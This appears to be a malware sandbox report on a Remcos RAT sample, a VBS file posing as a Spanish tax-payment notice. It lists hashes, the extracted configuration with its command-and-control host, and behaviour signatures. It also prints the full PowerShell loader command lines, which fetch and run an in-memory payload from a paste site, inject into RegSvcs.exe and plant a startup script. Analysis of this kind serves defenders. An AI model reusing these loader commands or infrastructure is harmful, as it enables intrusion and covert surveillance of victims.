remcos | 3a649ff19adaa0be44bdb367250683c93a350edf38b7ffb9d86559749b854fbc

General

Target

Administración Tributaria pagos atrasados.vbs
Size

201KB
MD5

0b4dc1bb49165555906e0a54ba35c40c
SHA1

5cc413e6b260a6d12f8cd7f89f60864d6616185f
SHA256

3a649ff19adaa0be44bdb367250683c93a350edf38b7ffb9d86559749b854fbc
SHA512

8100fb1ad8a3106d3eaeb7425b6c748b347384e2b5209a131cad325a53f031e7f9a8e4960117d4e5f026bbf985682e9fce07899404e75a23b4ccb1dd6971596b
SSDEEP

96:dyYRYFYDC3HFYSx9AXnXwEUfK2AUB/0zfNEWUvGcZ1+AN1qHk:d9uaYHFYH3AdfK2RB/0zfHcZJ1qE

Score

10^/10

remcos roda7 rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pasteio.com/download/xBVTIS53dQcN

Extracted

Family

remcos

Botnet

roda7

C2

defenderos2.con-ip.com:2425

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
r7uopsssa.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
Sbnsdcvvqq-54AH7S
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

5 3984 powershell.exe
9 3984 powershell.exe
12 3984 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe

flow	pid	process
5	3984	powershell.exe
9	3984	powershell.exe
12	3984	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d3vEukKaERTJu.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d3vEukKaERTJu.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3984 set thread context of 2916 3984 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2656 powershell.exe
2656 powershell.exe
3984 powershell.exe
3984 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2656 powershell.exe
Token: SeDebugPrivilege 3984 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegSvcs.exe

pid process

2916 RegSvcs.exe

description	pid	process	target process
PID 3984 set thread context of 2916	3984	powershell.exe	RegSvcs.exe

pid	process
2656	powershell.exe
2656	powershell.exe
3984	powershell.exe
3984	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe

pid	process
2916	RegSvcs.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1496 wrote to memory of 2656	1496	WScript.exe	powershell.exe
PID 1496 wrote to memory of 2656	1496	WScript.exe	powershell.exe
PID 2656 wrote to memory of 3984	2656	powershell.exe	powershell.exe
PID 2656 wrote to memory of 3984	2656	powershell.exe	powershell.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe
PID 3984 wrote to memory of 2916	3984	powershell.exe	RegSvcs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCvAL0AvgDkAK8ArwClAL0AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBpAG8ALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZAAvAHgAQgBWAFQASQBTAD⌚⌚⌚AMwBkAFEAYwBOACcAKQApADsAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcATgB3AGcAbwB4AE0ALgBLAFAASgBhAE4AagAnACkALgBHAG⌚⌚⌚AdABNAG⌚⌚⌚AdABoAG8AZAAoACcA⌚⌚⌚ABVAGwARwBLAEEAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAMAAvAE⌚⌚⌚AdgAzAGQAMQAvAGQALwBlAG⌚⌚⌚ALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwBkADMAdgBFAH⌚⌚⌚AawBLAGEARQBSAFQASgB1ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('¯½¾ä¯¯¥½', 'C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xBVTIS53dQcN'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('0/Ev3d1/d/ee.etsap//:sptth' , $RodaCopy , 'd3vEukKaERTJu' ))"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:2916

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
memory/2656-132-0x0000000000000000-mapping.dmp

Download
memory/2656-133-0x000001F02E1B0000-0x000001F02E1D2000-memory.dmp

Filesize
136KB

Download
memory/2656-144-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/2656-135-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/2916-138-0x00000000004327A4-mapping.dmp

Download
memory/2916-139-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2916-141-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2916-137-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2916-145-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2916-146-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3984-140-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/3984-136-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp

Filesize
10.8MB

Download
memory/3984-134-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads